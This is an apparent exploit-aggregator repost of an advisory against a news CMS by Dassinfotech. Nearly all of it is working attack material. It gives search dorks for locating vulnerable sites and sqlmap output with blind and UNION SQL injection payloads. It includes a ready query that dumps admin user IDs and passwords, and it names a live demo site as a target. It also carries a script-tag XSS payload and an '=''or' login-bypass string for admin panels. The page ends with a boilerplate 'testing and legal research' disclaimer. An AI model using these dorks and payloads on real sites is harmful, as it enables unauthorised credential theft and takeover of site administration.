Advertisement






News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability & Remote code Ex

CVE Category Price Severity
CVE-2019-13409 CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified Critical Remote 2020-06-05
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060021

Below is a copy:

News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability & Remote code Execution By Aryan Chehreghani
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel && XSS Vulnerability By Aryan Chehreghani
+ Date: 2020-06-05 
+ Vendor Homepage: https://www.dassinfotech.com
+ Auxiliary software  : http://sqlmap.org
+ Exploit Author : Aryan Chehreghani | Ictus_TM
+ Dork CVE: CVE-2019-13409
+ Dork CWE : CWE-89
+ Version: All Version 
+ Tested on: win,linux,mac
###########################################################################################################################
+ Dork  1 :      intext:Design by Dassinfotech.com
+ Dork  2 :      inurl:detailsnews.php?id= 
+ Dork  3 :      intext:Design by Dassinfotech.com inurl:detailsnews.php?id= 
+ Dork  4 :      inurl:php?id=  intext:Design By Dassinfotech.com
###########################################################################################################################
                                [SQL injection]
 [+] Method ( Sql injection ) Ictus Security Team of Iran 
 [+] parameter : id = latestnews.php?catid=25
 ###########################################################################################################################
 [+] Testing Method:
 [+] - UNION query
__________SQLMAP__________result : 
||||||||||||||||||||||| Parameter: sec (GET) || |||||||||||||||||||||||
arameter: catid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND 'rCId'=
'rCId

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: catid=15' UNION ALL SELECT CONCAT(0x716b767171,0x6c746c51566743754d
72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL-- -
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
[+]Using Sqlmap Example : sqlmap -u http://target.com/latestnews.php?catid=25 --dbs
========================================================================|
Exploit ==>
latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20-
 ========================================================================|
Demo:
 [+] http://ncrlife.in/latestnews.php?catid=25[SQL]
 ========================================================================|
                                [XSS Vulnerability]
 [+] Method :"><script>alert('Aryan Chehreghani | Ictus_TM')</script><"  
 [+] Type Code IN search Value / some Value 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                [Bypass Admin panel]
[+] Payload U / P  :   '=''or' / '=''or'
[+]Login Pages     :    victim.com/matri/login.php victim.com/india/login.php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 [=] T.me/Clvsornapv
 [=] Telegram Channel ==> T.me/Ictus_TM

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum